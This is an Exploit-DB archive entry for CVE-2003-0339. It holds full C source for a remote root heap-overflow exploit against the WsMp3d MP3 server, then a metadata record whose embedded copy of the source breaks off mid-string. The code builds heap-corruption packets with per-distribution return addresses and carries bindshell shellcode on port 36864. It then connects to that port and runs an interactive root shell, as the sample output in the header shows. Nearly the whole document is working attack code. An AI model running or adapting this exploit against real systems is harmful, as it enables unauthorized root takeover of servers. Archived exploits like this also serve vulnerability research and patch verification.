ID EDB-ID:33
Type exploitdb
Reporter Xpl017Elz
Modified 2003-05-22T00:00:00
Description
WsMp3d 0.x Remote Root Heap Overflow Exploit. CVE-2003-0339. Remote exploit for the Linux platform.
/*
**
** [*] Title: Remote Heap Corruption Overflow vulnerability in WsMp3d
** [+] Exploit: 0x82-Remote.WsMp3d.again.c
**
** bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2
**
** WsMp3 Server Heap Corruption Remote root exploit
** by Xpl017Elz.
** [+] Hostname: 61.37.xxx.xx
** [+] Port num: 8000
** [+] Retloc address: 0x8058d8c
** [+] Retaddr address: 0x80648bf
** [1] #1 Set socket.
** [2] First, send exploit packet.
** [3] #2 Set socket.
** [4] Second, send exploit packet.
** [5] Waiting, executes the shell ! (3Sec)
** [6] Trying 61.37.xxx.xx:36864 ...
** [7] Connected to 61.37.xxx.xx:36864 !
**
** [*] Executed shell successfully !
**
** Linux xpl017elz 2.2.12-20kr #1 Tue Oct 12 17:08:15 KST 1999 i586 unknown
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
** 6(disk),10(wheel)
** bash#
**
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
/* One row of the target table (__pl_form) below. */
struct op_plat_st
{
int op_plat_num;   /* selector given with -t; the value 0x82 marks the end of the table */
char *op_plat_sys; /* human-readable row name printed by x_fp_rm_usage() */
u_long retloc;     /* passed as fd_sx to __eat_sucks_heap_data_send() by main() */
u_long retaddr;    /* passed as bk_sx to __eat_sucks_heap_data_send() by main() */
int off_st;        /* only the commented-out rows set this to 1; nothing in this file reads it */
};
/*
** Target table: consulted by main() for the -t option and listed by
** x_fp_rm_usage(). Row layout is {num, name, retloc, retaddr, off_st}; the
** {0x82,NULL,...} row is the end-of-table sentinel that both walkers stop at.
** main() accepts -t values below 6, which matches the six live rows here.
*/
struct op_plat_st __pl_form[]=
{
/*{num,linux,globl val,heap val}*/
{0,"Linux WsMp3 Binary I (Default)",0x08059490,0x08064e8f,0},
{1,"Linux WsMp3 Binary II (Default)",0x08059490,0x08063e97,0},
//08058d8c R_386_JUMP_SLOT malloc
{2,"RedHat Linux 6.1 (Compile)",0x08058d8c,0x080648bf,0},
{3,"RedHat Linux 6.2 (Compile)",0x08058d8c,0x080646f3,0},
{4,"RedHat Linux 7.0 (Compile)",0x0809aa68,0x080a5cb3,0},
{5,"Linux all DoS (Compile)",0x82828282,0x82828282,0},
/* rows 6-8 are disabled; they are also the only rows that set off_st
{6,"RedHat Linux 7.1",0x0,0x0,1},
{7,"RedHat Linux 8.0",0x0,0x82828282,1},
{8,"RedHat Linux 9.0",0x0,0x82828282,1},
*/
{0x82,NULL,0,0,0}
};
/* Forward declarations; the definitions follow main() except for the two helpers right below. */
int sexsock(char *conn_host_nm,int conn_port_nm);   /* resolve + TCP connect; -1 on failure */
void start_shell(int st_sock_va);                   /* stdin <-> socket relay loop */
void re_connt_lm(int st_sock_va);                   /* exit(-1) when st_sock_va is -1 */
void __xpl_banrl();                                 /* banner to stdout */
void x_fp_rm_usage(char *x_fp_rm);                  /* usage text and target list, then exit(0) */
int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx); /* build + send one request body */
/* Write the two-line program banner to stdout. */
void __xpl_banrl()
{
    fputs("\n WsMp3 Server Heap Corruption Remote root exploit (Again)\n", stdout);
    fputs(" by Xpl017Elz.\n", stdout);
}
/*
** Print the usage text and the selectable rows of __pl_form, then exit(0).
** x_fp_rm is the program name (argv[0]). The table walk stops at the row
** whose op_plat_num is 0x82, the end-of-table sentinel.
*/
void x_fp_rm_usage(char *x_fp_rm)
{
    fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
    fputs("\t -h [hostname] - target host.\n", stdout);
    fputs("\t -p [port] - port number.\n", stdout);
    fputs("\t -r [addr] - retloc address. (malloc globl)\n", stdout);
    fputs("\t -s [addr] - &shellcode address.\n\n", stdout);
    fprintf(stdout," Example> %s -h target_hostname -p 8000\n",x_fp_rm);
    fputs(" Select target number>\n\n", stdout);
    for (const struct op_plat_st *row = __pl_form; row->op_plat_num != 0x82; row++) {
        fprintf(stdout,"\t {%d} %s\n",row->op_plat_num,row->op_plat_sys);
    }
    fputs("\n", stdout);
    exit(0);
}
/*
** name: desc->action (free)
** content: chat cmd ("CHA")
** content size: 3
** buffer size: 4+12 (Bin:1000[0])
**
** name: desc->what
** content: garbage (clear)
** content size: 1024
** buffer size: 4+4+1+1024 (Bin:1000000100[1])
*/
/*
** Assemble one request body in a stack buffer and send() it on st_sock_va.
**
** st_sock_va: a connected socket; it is returned unchanged so main() can
**             chain the call and close() the result.
** fd_sx, bk_sx: the two values stored after the size fields (main() passes
**             the selected row's retloc and retaddr; fd_sx has 0x0c subtracted).
**
** Returns st_sock_va. The return value of send() is not checked, and the
** length handed to send() is strlen() of the buffer, so transmission stops
** at the first NUL byte of the assembled body rather than at atk_buf_pos.
*/
int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx)
{
int wy_clean_data_q;
char nop_n_jump[]={0x42,0x0c,0xeb,0x41};
int atk_buf_pos=0; /* write cursor into step_atk_code_st */
char oxa_oxd[]={0x0a,0x0d}; /* request terminator appended last */
#define PORT_Q (36864) /* used here only as the send-buffer size; macros are file-scoped from this point on */
#define __CLN_DT_LEN ((0x00000400)+(0x00000001))
char step_atk_code_st[PORT_Q];
#define __OF_BY_ONE (0x01)
char p_rev_size[]={0xfc,0xff,0xff,0xff}; /* chunk size */
char __size_fd[]={0xff,0xff,0xff,0xff}; /* data section size */
char cln_dt_buf[__CLN_DT_LEN]; /* 0x401 bytes, filled with 0x82 below */
char chat_inf_send_code[]={0x43,0x48,0x41}; /* "CHA" without a terminator */
char shellcode[]={
/* bindshell port 36864 */
0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,
0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,
0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,
0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,
0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,
0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,
0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,
0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,
0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,
0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,
0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,
0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,
0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,
0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,
0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,
0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
};
int send_shcode_lsz=sizeof(shellcode); /* NOTE(review): assigned but never read */
memset((char *)cln_dt_buf,0x82,sizeof(cln_dt_buf));
memset((char *)step_atk_code_st,0,sizeof(step_atk_code_st));
/*
desc->action:malloc(10); // cleanup
*/
/* command token followed by one space */
memcpy(step_atk_code_st+atk_buf_pos,chat_inf_send_code,sizeof(chat_inf_send_code));
atk_buf_pos+=(sizeof(chat_inf_send_code));
memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
atk_buf_pos+=(__OF_BY_ONE);
/*
void rem_req_descriptor(req_descriptor *desc);
desc->what[sizeof(desc->what)]='\0';free(desc->what);desc->what=NULL;
*/
memcpy(step_atk_code_st+atk_buf_pos,cln_dt_buf,sizeof(cln_dt_buf));
atk_buf_pos+=(sizeof(cln_dt_buf));
/* chunk size */
memcpy(step_atk_code_st+atk_buf_pos,p_rev_size,sizeof(p_rev_size));
atk_buf_pos+=(sizeof(p_rev_size));
/* data section size */
memcpy(step_atk_code_st+atk_buf_pos,__size_fd,sizeof(__size_fd));
atk_buf_pos+=(sizeof(__size_fd));
{
/* NOTE(review): type-punned stores through a long*. Each writes sizeof(long)
   bytes at an unaligned offset while the cursor advances by 4, so this
   assumes an ILP32 build and is undefined under strict aliasing. */
*(long *)&step_atk_code_st[atk_buf_pos]=(fd_sx-(0x0c));
atk_buf_pos+=4; /* forward ptr */
*(long *)&step_atk_code_st[atk_buf_pos]=(bk_sx);
atk_buf_pos+=4; /* back ptr */
}
memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
atk_buf_pos+=(__OF_BY_ONE);
/* 0x190/4 = 100 copies of nop_n_jump (400 bytes) */
for(wy_clean_data_q=0;wy_clean_data_q<0x190;wy_clean_data_q+=4)
{
memcpy(step_atk_code_st+atk_buf_pos,nop_n_jump,sizeof(nop_n_jump));
atk_buf_pos+=(sizeof(nop_n_jump));
}
memcpy(step_atk_code_st+atk_buf_pos,shellcode,sizeof(shellcode));
atk_buf_pos+=(sizeof(shellcode));
memcpy(step_atk_code_st+atk_buf_pos,oxa_oxd,sizeof(oxa_oxd));
atk_buf_pos+=(sizeof(oxa_oxd));
/* length is strlen(), not atk_buf_pos; result unchecked */
send(st_sock_va,step_atk_code_st,strlen(step_atk_code_st),0);
return(st_sock_va);
}
/*
** Entry point: parse options, open two connections to the target and send
** the request body built by __eat_sucks_heap_data_send() on each, then
** connect to ATK_CPT on the same host and hand that socket to start_shell().
** Every connection failure is fatal via re_connt_lm(). Exit status is 0 on
** the normal path, -1 (255) on failure or for -i.
*/
int main(int argc,char *argv[])
{
int sock,tg_sk;
#define D_PORT (8000)
#define ATK_CPT (36864)
int port=(D_PORT);
#define D_HOST "x82.inetcop.org"
/* D_HOST doubles as a "no -h given" sentinel: the strcmp() below prints usage if it is unchanged */
char hostname[0x82]=D_HOST;
int whlp,type=0;
u_long retloc=__pl_form[type].retloc;
u_long retaddr=__pl_form[type].retaddr;
(void)__xpl_banrl();
/* 'X'/'x' are accepted by the option string but handled by no case below;
   getopt() returns -1 on end of options, which equals EOF on this libc */
while((whlp=getopt(argc,argv,"T:t:R:r:S:s:H:h:P:p:IiXx"))!=EOF)
{
extern char *optarg; /* already declared by <unistd.h>; redundant */
switch(whlp)
{
case 'T':
case 't':
/* NOTE(review): atoi() reports no errors and the test is only "< 6", so a
   negative -t value passes and indexes __pl_form out of bounds */
if((type=atoi(optarg))<6)
{
retloc=__pl_form[type].retloc;
retaddr=__pl_form[type].retaddr;
}
else (void)x_fp_rm_usage(argv[0]); /* exits; the break is not reached on this path */
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0); /* base 0: accepts 0x... hex and decimal */
break;
case 'S':
case 's':
retaddr=strtoul(optarg,NULL,0);
break;
case 'H':
case 'h':
/* memset() first so the strncpy() copy is always NUL-terminated */
memset((char *)hostname,0,sizeof(hostname));
strncpy(hostname,optarg,sizeof(hostname)-1);
break;
case 'P':
case 'p':
port=atoi(optarg); /* unchecked; a non-numeric value becomes port 0 */
break;
case 'I':
case 'i':
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
exit(-1);
case '?':
(void)x_fp_rm_usage(argv[0]); /* exits */
break;
}
}
if(!strcmp(hostname,D_HOST))
{
(void)x_fp_rm_usage(argv[0]); /* no -h given: print usage and exit */
}
{
fprintf(stdout," [+] Hostname: %s\n",hostname);
fprintf(stdout," [+] Port num: %d\n",port);
/* NOTE(review): %p expects a void*; retloc/retaddr are u_long, so these two
   calls are a format/argument mismatch (-Wformat); "%#lx" would match the type */
fprintf(stdout," [+] Retloc address: %p\n",retloc);
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
}
fprintf(stdout," [1] #1 Set socket.\n");
sock=(int)sexsock(hostname,port);
(void)re_connt_lm(sock); /* exits on -1 */
fprintf(stdout," [2] First, send exploit packet.\n");
sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr); /* returns the same descriptor */
close(sock);
fprintf(stdout," [3] #2 Set socket.\n");
sock=(int)sexsock(hostname,port);
(void)re_connt_lm(sock);
fprintf(stdout," [4] Second, send exploit packet.\n");
sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr); /* this second socket is never close()d; it lives until exit() */
fprintf(stdout," [5] Waiting, executes the shell ! (3Sec)\n");
sleep(3);
fprintf(stdout," [6] Trying %s:%d ...\n",hostname,(ATK_CPT));
tg_sk=(int)sexsock(hostname,(ATK_CPT));
(void)re_connt_lm(tg_sk);
fprintf(stdout," [7] Connected to %s:%d !\n\n",hostname,(ATK_CPT));
(void)start_shell(tg_sk); /* does not return; exit(0) happens inside when the peer closes */
exit(0);
}
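/*
** Resolve conn_host_nm with gethostbyname() and open a TCP connection to
** conn_port_nm (host byte order).
**
** Returns the connected socket descriptor, or -1 after reporting the failing
** step with herror()/perror(). The descriptor is closed when connect() fails,
** so a failed attempt does not leak an fd.
*/
int sexsock(char *conn_host_nm,int conn_port_nm)
{
    struct hostent *sxp = gethostbyname(conn_host_nm);
    if (sxp == NULL) {
        herror(" [-] gethostbyname() error");
        return -1;
    }

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror(" [-] socket() error");
        return -1;
    }

    /* {0} zero-fills sin_zero, so no separate bzero() is needed */
    struct sockaddr_in sxp_addr = {0};
    sxp_addr.sin_family = AF_INET;
    sxp_addr.sin_port = htons((unsigned short)conn_port_nm);
    /* h_addr_list[0] is the first resolved address; copy instead of casting */
    memcpy(&sxp_addr.sin_addr, sxp->h_addr_list[0], sizeof sxp_addr.sin_addr);

    if (connect(sock, (struct sockaddr *)&sxp_addr, sizeof sxp_addr) == -1) {
        perror(" [-] connect() error");
        close(sock); /* fix: the original returned -1 and leaked this descriptor */
        return -1;
    }
    return sock;
}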
/*
** Interactive relay: send `command` on st_sock_va, then loop forwarding
** socket output to stdout and stdin input to the socket until a socket read
** returns <= 0, at which point the process exit(0)s. Never returns normally.
**
** st_sock_va: a connected socket; nfds = st_sock_va+1 relies on it being
** larger than STDIN_FILENO, which holds for any descriptor opened after fd 0-2.
*/
void start_shell(int st_sock_va)
{
int died; /* byte count from the last read(); <= 0 on the socket ends the program */
char *command="uname -a; id; export TERM=vt100; exec bash -i\n";
char readbuf[1024];
fd_set rset;
memset((char *)readbuf,0,sizeof(readbuf));
fprintf(stdout," [*] Executed shell successfully !\n\n");
send(st_sock_va,command,strlen(command),0); /* result unchecked */
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(st_sock_va,&rset);
FD_SET(STDIN_FILENO,&rset);
/* NOTE(review): the select() result is not checked; an error (e.g. EINTR)
   leaves rset in an unspecified state before the FD_ISSET tests below */
select(st_sock_va+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(st_sock_va,&rset))
{
/* read at most sizeof-1 so readbuf[died]=0 stays in bounds */
died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
if(died<=0)
exit(0);
readbuf[died]=0;
fprintf(stdout,"%s",readbuf); /* stops at the first NUL in the data */
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>0)
{
readbuf[died]=0;
write(st_sock_va,readbuf,died); /* short writes and errors are ignored */
}
}
}
return; /* unreachable: the loop above only leaves via exit(0) */
}
/*
** Guard for sexsock() results: a value of -1 prints a failure notice to
** stdout and terminates the process with exit(-1); any other value is a no-op.
*/
void re_connt_lm(int st_sock_va)
{
    if (st_sock_va != -1) {
        return;
    }
    fputs(" [-] Failed.\n\n", stdout);
    fputs(" Happy Exploit ! :-)\n\n", stdout);
    exit(-1);
}
// milw0rm.com [2003-05-22]
{"id": "EDB-ID:33", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WsMp3d 0.x - Remote Root Heap Overflow Exploit", "description": "WsMp3d 0.x Remote Root Heap Overflow Exploit. CVE-2003-0339. Remote exploit for linux platform", "published": "2003-05-22T00:00:00", "modified": "2003-05-22T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/33/", "reporter": "Xpl017Elz", "references": [], "cvelist": ["CVE-2003-0339"], "lastseen": "2016-01-31T11:18:52", "viewCount": 9, "enchantments": {"score": {"value": 7.9, "vector": "NONE", "modified": "2016-01-31T11:18:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0339"]}, {"type": "osvdb", "idList": ["OSVDB:12028"]}], "modified": "2016-01-31T11:18:52", "rev": 2}, "vulnersScore": 7.9}, "sourceHref": "https://www.exploit-db.com/download/33/", "sourceData": "/*\r\n**\r\n** [*] Title: Remote Heap Corruption Overflow vulnerability in WsMp3d\r\n** [+] Exploit: 0x82-Remote.WsMp3d.again.c\r\n**\r\n** bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2\r\n**\r\n** WsMp3 Server Heap Corruption Remote root exploit\r\n** by Xpl017Elz.\r\n** [+] Hostname: 61.37.xxx.xx\r\n** [+] Port num: 8000\r\n** [+] Retloc address: 0x8058d8c\r\n** [+] Retaddr address: 0x80648bf\r\n** [1] #1 Set socket.\r\n** [2] First, send exploit packet.\r\n** [3] #2 Set socket.\r\n** [4] Second, send exploit packet.\r\n** [5] Waiting, executes the shell ! 
(3Sec)\r\n** [6] Trying 61.37.xxx.xx:36864 ...\r\n** [7] Connected to 61.37.xxx.xx:36864 !\r\n**\r\n** [*] Executed shell successfully !\r\n**\r\n** Linux xpl017elz 2.2.12-20kr #1 Tue Oct 12 17:08:15 KST 1999 i586 unknown\r\n** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),\r\n** 6(disk),10(wheel)\r\n** bash#\r\n**\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n\r\nstruct op_plat_st\r\n{\r\n\tint op_plat_num;\r\n\tchar *op_plat_sys;\r\n\tu_long retloc;\r\n\tu_long retaddr;\r\n\tint off_st;\r\n};\r\nstruct op_plat_st __pl_form[]=\r\n{\r\n\t/*{num,linux,globl val,heap val}*/\r\n\t{0,\"Linux WsMp3 Binary I (Default)\",0x08059490,0x08064e8f,0},\r\n\t{1,\"Linux WsMp3 Binary II (Default)\",0x08059490,0x08063e97,0},\r\n\t//08058d8c R_386_JUMP_SLOT malloc\r\n\t{2,\"RedHat Linux 6.1 (Compile)\",0x08058d8c,0x080648bf,0},\r\n\t{3,\"RedHat Linux 6.2 (Compile)\",0x08058d8c,0x080646f3,0},\r\n\t{4,\"RedHat Linux 7.0 (Compile)\",0x0809aa68,0x080a5cb3,0},\r\n\t{5,\"Linux all DoS (Compile)\",0x82828282,0x82828282,0},\r\n/*\t{6,\"RedHat Linux 7.1\",0x0,0x0,1},\r\n\t{7,\"RedHat Linux 8.0\",0x0,0x82828282,1},\r\n\t{8,\"RedHat Linux 9.0\",0x0,0x82828282,1},\r\n*/\r\n\t{0x82,NULL,0,0,0}\r\n};\r\n\r\nint sexsock(char *conn_host_nm,int conn_port_nm);\r\nvoid start_shell(int st_sock_va);\r\nvoid re_connt_lm(int st_sock_va);\r\nvoid __xpl_banrl();\r\nvoid x_fp_rm_usage(char *x_fp_rm);\r\nint __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx);\r\n\r\nvoid __xpl_banrl()\r\n{\r\n\tfprintf(stdout,\"\\n WsMp3 Server Heap Corruption Remote root exploit (Again)\\n\");\r\n\tfprintf(stdout,\" by Xpl017Elz.\\n\");\r\n}\r\n\r\nvoid x_fp_rm_usage(char *x_fp_rm)\r\n{\r\n\tint __t_xmp=0;\r\n\tfprintf(stdout,\"\\n Usage: %s -[option] [arguments]\\n\\n\",x_fp_rm);\r\n\tfprintf(stdout,\"\\t -h [hostname] - target host.\\n\");\r\n\tfprintf(stdout,\"\\t -p [port] - port 
number.\\n\");\r\n\tfprintf(stdout,\"\\t -r [addr] - retloc address. (malloc globl)\\n\");\r\n\tfprintf(stdout,\"\\t -s [addr] - &shellcode address.\\n\\n\");\r\n\tfprintf(stdout,\" Example> %s -h target_hostname -p 8000\\n\",x_fp_rm);\r\n\tfprintf(stdout,\" Select target number>\\n\\n\");\r\n\tfor(;;)\r\n\t{\r\n\t\tif(__pl_form[__t_xmp].op_plat_num==(0x82))\r\n\t\t\tbreak;\r\n\t\telse\r\n\t\t{\r\n\t\t\t\r\nfprintf(stdout,\"\\t {%d} %s\\n\",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);\r\n\t\t}\r\n\t\t__t_xmp++;\r\n\t}\r\n\tfprintf(stdout,\"\\n\");\r\n\texit(0);\r\n}\r\n\r\n/*\r\n** name: desc->action (free)\r\n** content: chat cmd (\"CHA\")\r\n** content size: 3\r\n** buffer size: 4+12 (Bin:1000[0])\r\n**\r\n** name: desc->what\r\n** content: garbage (clear)\r\n** content size: 1024\r\n** buffer size: 4+4+1+1024 (Bin:1000000100[1])\r\n*/\r\n\r\nint __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx)\r\n{\r\n\tint wy_clean_data_q;\r\n\tchar nop_n_jump[]={0x42,0x0c,0xeb,0x41};\r\n\tint atk_buf_pos=0;\r\n\tchar oxa_oxd[]={0x0a,0x0d};\r\n#define PORT_Q (36864)\r\n#define __CLN_DT_LEN ((0x00000400)+(0x00000001))\r\n\tchar step_atk_code_st[PORT_Q];\r\n#define __OF_BY_ONE (0x01)\r\n\tchar p_rev_size[]={0xfc,0xff,0xff,0xff}; /* chunk size */\r\n\tchar __size_fd[]={0xff,0xff,0xff,0xff}; /* data section size */\r\n\tchar cln_dt_buf[__CLN_DT_LEN];\r\n\tchar chat_inf_send_code[]={0x43,0x48,0x41};\r\n\tchar shellcode[]={\r\n\t\t/* bindshell port 36864 
*/\r\n\t\t0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,\r\n\t\t0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,\r\n\t\t0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,\r\n\t\t0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,\r\n\t\t0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,\r\n\t\t0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,\r\n\t\t0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,\r\n\t\t0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,\r\n\t\t0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,\r\n\t\t0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,\r\n\t\t0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,\r\n\t\t0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,\r\n\t\t0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,\r\n\t\t0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,\r\n\t\t0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,\r\n\t\t0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68\r\n\t};\r\n\tint send_shcode_lsz=sizeof(shellcode);\r\n\r\n\tmemset((char *)cln_dt_buf,0x82,sizeof(cln_dt_buf));\r\n\tmemset((char *)step_atk_code_st,0,sizeof(step_atk_code_st));\r\n\t/*\r\n\tdesc->action:malloc(10); // cleanup\r\n\t*/\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,chat_inf_send_code,sizeof(chat_inf_send_code));\r\n\tatk_buf_pos+=(sizeof(chat_inf_send_code));\r\n\tmemset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);\r\n\tatk_buf_pos+=(__OF_BY_ONE);\r\n\t/*\r\n\tvoid rem_req_descriptor(req_descriptor *desc);\r\n\tdesc->what[sizeof(desc->what)]='\\0';free(desc->what);desc->what=NULL;\r\n\t*/\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,cln_dt_buf,sizeof(cln_dt_buf));\r\n\tatk_buf_pos+=(sizeof(cln_dt_buf));\r\n\t/* chunk size */\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,p_rev_size,sizeof(p_rev_size));\r\n\tatk_buf_pos+=(sizeof(p_rev_size));\r\n\t/* data section size */\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,__size_fd,sizeof(__size_fd));\r\n\tatk_buf_pos+=(sizeof(__size_fd));\r\n\t{\r\n\t\t*(long *)&step_atk_code_st[atk_buf_pos]=(fd_sx-(0x0c));\r\n\t\tatk_buf_pos+=4; /* forward ptr */\r\n\t\t*(long *)&step_atk_code_st[atk_buf_pos]=(bk_sx);\r\n\t\tatk_buf_pos+=4; /* back ptr 
*/\r\n\t}\r\n\tmemset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);\r\n\tatk_buf_pos+=(__OF_BY_ONE);\r\n\tfor(wy_clean_data_q=0;wy_clean_data_q<0x190;wy_clean_data_q+=4)\r\n\t{\r\n\t\tmemcpy(step_atk_code_st+atk_buf_pos,nop_n_jump,sizeof(nop_n_jump));\r\n\t\tatk_buf_pos+=(sizeof(nop_n_jump));\r\n\t}\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,shellcode,sizeof(shellcode));\r\n\tatk_buf_pos+=(sizeof(shellcode));\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,oxa_oxd,sizeof(oxa_oxd));\r\n\tatk_buf_pos+=(sizeof(oxa_oxd));\r\n\r\n\tsend(st_sock_va,step_atk_code_st,strlen(step_atk_code_st),0);\r\n\treturn(st_sock_va);\r\n}\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tint sock,tg_sk;\r\n#define D_PORT (8000)\r\n#define ATK_CPT (36864)\r\n\tint port=(D_PORT);\r\n#define D_HOST \"x82.inetcop.org\"\r\n\tchar hostname[0x82]=D_HOST;\r\n\tint whlp,type=0;\r\n\r\n\tu_long retloc=__pl_form[type].retloc;\r\n\tu_long retaddr=__pl_form[type].retaddr;\r\n\r\n\t(void)__xpl_banrl();\r\n\twhile((whlp=getopt(argc,argv,\"T:t:R:r:S:s:H:h:P:p:IiXx\"))!=EOF)\r\n\t{\r\n\t\textern char *optarg;\r\n\t\tswitch(whlp)\r\n\t\t{\r\n\t\t\tcase 'T':\r\n\t\t\tcase 't':\r\n\t\t\t\tif((type=atoi(optarg))<6)\r\n\t\t\t\t{\r\n\t\t\t\t\tretloc=__pl_form[type].retloc;\r\n\t\t\t\t\tretaddr=__pl_form[type].retaddr;\r\n\t\t\t\t}\r\n\t\t\t\telse (void)x_fp_rm_usage(argv[0]);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 'R':\r\n\t\t\tcase 'r':\r\n\t\t\t\tretloc=strtoul(optarg,NULL,0);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'S':\r\n\t\t\tcase 's':\r\n\t\t\t\tretaddr=strtoul(optarg,NULL,0);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'H':\r\n\t\t\tcase 'h':\r\n\t\t\t\tmemset((char *)hostname,0,sizeof(hostname));\r\n\t\t\t\tstrncpy(hostname,optarg,sizeof(hostname)-1);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'P':\r\n\t\t\tcase 'p':\r\n\t\t\t\tport=atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'I':\r\n\t\t\tcase 'i':\r\n\t\t\t\tfprintf(stderr,\" Try `%s -?' 
for more information.\\n\\n\",argv[0]);\r\n\t\t\t\texit(-1);\r\n\t\t\t\t\r\n\t\t\tcase '?':\r\n\t\t\t\t(void)x_fp_rm_usage(argv[0]);\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\t\r\n\tif(!strcmp(hostname,D_HOST))\r\n\t{\r\n\t\t(void)x_fp_rm_usage(argv[0]);\r\n\t}\r\n\t{\r\n\t\tfprintf(stdout,\" [+] Hostname: %s\\n\",hostname);\r\n\t\tfprintf(stdout,\" [+] Port num: %d\\n\",port);\r\n\t\tfprintf(stdout,\" [+] Retloc address: %p\\n\",retloc);\r\n\t\tfprintf(stdout,\" [+] Retaddr address: %p\\n\",retaddr);\r\n\t}\r\n\tfprintf(stdout,\" [1] #1 Set socket.\\n\");\r\n\tsock=(int)sexsock(hostname,port);\r\n\t(void)re_connt_lm(sock);\r\n\t\r\n\tfprintf(stdout,\" [2] First, send exploit packet.\\n\");\r\n\tsock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);\r\n\tclose(sock);\r\n\t\r\n\tfprintf(stdout,\" [3] #2 Set socket.\\n\");\r\n\tsock=(int)sexsock(hostname,port);\r\n\t(void)re_connt_lm(sock);\r\n\t\r\n\tfprintf(stdout,\" [4] Second, send exploit packet.\\n\");\r\n\tsock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);\r\n\t\r\n\tfprintf(stdout,\" [5] Waiting, executes the shell ! 
